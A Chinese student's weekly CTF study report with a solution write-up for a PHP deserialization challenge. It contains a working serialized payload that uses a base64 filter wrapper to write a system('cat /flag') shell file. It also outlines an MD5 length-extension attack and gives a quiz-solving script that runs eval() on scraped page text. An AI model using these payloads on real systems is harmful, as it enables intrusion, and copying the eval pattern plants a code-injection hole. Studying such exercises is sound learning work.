汇报人：黄昱卓<br />日期：2023.10.15
<a name="uO6RN"></a>
## 本周内容
1.继续进行山河CTF<br />2.初步了解go语言<br />3.学习python flask
<a name="FxuA8"></a>
## 成果展示：
遇到了一道有意思的反序列化，在里面学了file_put_content的用法<br />1.**sseerriiaalliizzee**
```php
<?php
highlight_file(__FILE__);

classStart{
public $barking;
publicfunction __construct(){
$this->barking =newFlag;
}
publicfunction __toString(){
return $this->barking->dosomething();
}
}

class CTF{
public $part1;
public $part2;
publicfunction __construct($part1='',$part2=''){
$this -> part1 = $part1;
$this -> part2 = $part2;

}
publicfunction dosomething(){
$useless   ='<?php die("+Genshin Impact Start!+");?>';
$useful= $useless. $this->part2;
file_put_contents($this-> part1,$useful);
}
}
class Flag{
public function dosomething(){
include('./flag,php');
return "barking for fun!";

}
}

$code=$_POST['code']; 
if(isset($code)){
echo unserialize($code);
}
else{
echo "no way, fuck off";
}
?>
```


这道题出的非常有意思，看到了file_put_contents( )肯定是新写入一个新文件，注入一句话木马或者直接写入system(“cat /flag”)<br />首先看反序列化，Flag类中包含了一个假的flag.php，我们访问之后发现这个文件确实存在，所以我们可以利用这个文件，Start类和CTF类中都有可以传的参数，   再看最后会有一个echo反序列化的结果，这个过程会调用__tostring，我们想要使用file_put_contents( )就必须调用dosomething()，这时候CTF类中的两个参数是当然不够的，所以我们需要利用__tostring中的$this->barking->dosomething(); 这时候不能让barking指向Flag类中，所以我们在__construct触发之后就跳到CTF类中，这样就可以利用dosomething()了<br />接下来看这个死亡绕过，我们需要把这个die()绕过，可以用php伪协议base64把它转化成为乱码，然后后面传入正常base64字符，这样就可以把题目给的die()变成乱码，后面执行我们的任意代码<br />Payload:
```php
$pop =newStart;
$pop->barking =new CTF;
$pop->barking->part1="php://filter/write=convert.base64-decode/resource=flag.php";
$pop ->barking->part2="abPD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs=";
echo serialize($pop);
```
因为要把<?php die("+Genshin Impact Start!+");?>变成乱码但不改变后面，我们需要对base64进行补码，最多补3个，所以都是一下，最终我添加了ab两个字符成功。<br />code=O:5:"Start":1:{s:7:"barking";O:3:"CTF":2:{s:5:"part1";s:58:"php://filter/write=convert.base64-decode/resource=flag.php";s:5:"part2";s:38:"abPD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs=";}}<br />2.md5长度拓展攻击<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1697891532600-655d57dc-82f8-46c4-be63-eb9007ba9420.png#averageHue=%23e9e8e7&clientId=ud928ca65-c0b5-4&from=paste&height=616&id=u53b9fcde&originHeight=616&originWidth=1124&originalType=binary&ratio=1&rotation=0&showTitle=false&size=197018&status=done&style=none&taskId=u502aa0c9-8fd7-4a27-822c-52af266d52a&title=&width=1124)<br />如图先考察parse_url解析传输的url，是个套娃，我的思路是先协议指向域名，域名再指向用户<br />然后让传输length，让num x 100 不等于整数位 num x 100 只需要传输一个小数点后3位的数字就行<br />得到了flag的md5和长度<br />然后是一个md5长度拓展攻击，我们需要用到hashpump这个工具，原理是md5的补齐算法，已知flag的最后一个字符是}<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1697891546141-ca15c89f-3a5e-4b70-9187-a154273ac501.png#averageHue=%23161616&clientId=ud928ca65-c0b5-4&from=paste&height=176&id=uc2ced056&originHeight=176&originWidth=1125&originalType=binary&ratio=1&rotation=0&showTitle=false&size=23490&status=done&style=none&taskId=u09a55379-df58-4169-956d-6f9c2fb905e&title=&width=1125)<br />生成的md5是拼接后的md5，然后下面的是需要拼接的字符串，因为有}了所以需要删掉}，然后转换为url编码，吧\x转换成%<br />传入![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1697891554005-c1d93bc8-f181-49d7-9248-a5675ddbd6e5.png#averageHue=%23f9f8f8&clientId=ud928ca65-c0b5-4&from=paste&height=406&id=uddacf007&originHeight=406&originWidth=1013&originalType=binary&ratio=1&rotation=0&showTitle=false&size=194816&status=done&style=none&taskId=uf04782cf-fa09-4731-b423-e6d7fe74117&title=&width=1013)<br />3.快问快答<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1697893666465-b25dd9d1-fb76-4a81-91fc-fb3e29de809a.png#averageHue=%23d0d0d0&clientId=uc35d4260-191e-4&from=paste&height=742&id=u6ad4e2d5&originHeight=742&originWidth=922&originalType=binary&ratio=1&rotation=0&showTitle=false&size=43302&status=done&style=none&taskId=u9326efaf-e62c-48c1-9563-3cedce883af&title=&width=922)<br />要求进行运算，和pwn的计算器很像，用python写一个正则表达式，然后替换异或，与，x和➗为计算机能识别的运算符，然后先抓包看一下格式，是post answer=1，所以只需要用python post answer就行了，然后因为题目要求在读到题目之后休息一秒并在2s内回答，所以我们先get拿到题目，然后post 答案<br />要注意的是python运算除号会保留小数，但是网页计算只保留整数，所以需要int()进行类型转换<br />脚本如下

```php
import requests
from bs4 import BeautifulSoup
import re
import time

url = 'http://112.6.51.212:32320/'

# 创建一个session对象，它可以在多个请求之间保持cookies
session = requests.Session()

for _ in range(50):
    # 获取网页内容
    response = session.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')

    # 找到计算式并计算结果
    question = soup.find('h3').text.split('：')[1].split(' = ')[0]
    # 替换x和除号为Python运算符
    question = question.replace('x', '*').replace('÷', '/').replace('异或','^').replace('与','&')
    answer = int(eval(question))
    # 在获取页面信息后等待1.1秒
    time.sleep(1.1)

    # POST结果到网站
    response = session.post(url, data={'answer': answer})
    print(response.text)
    # 检查是否正确并输出数字
    match = re.search('你已经答对了(\d+)', response.text)
    if match:
        print('你已经答对了', match.group(1))
    else:
        print('错误的答案')
        break

```
<a name="vZ62f"></a>
## 思考
这周各个方面还是忙，学校课程高数和线代拉下了一直没时间补，web方面一下子接触的新方面有点多，这周把杂七杂八的都看了一下，比如说都学了go语言和pyflask的读码，md5的拓展攻击和file_put_content的基础用法，但是都没学精，遇到题就会卡住，一卡就卡一下午，还是需要学的东西太多了，下周再接再厉！
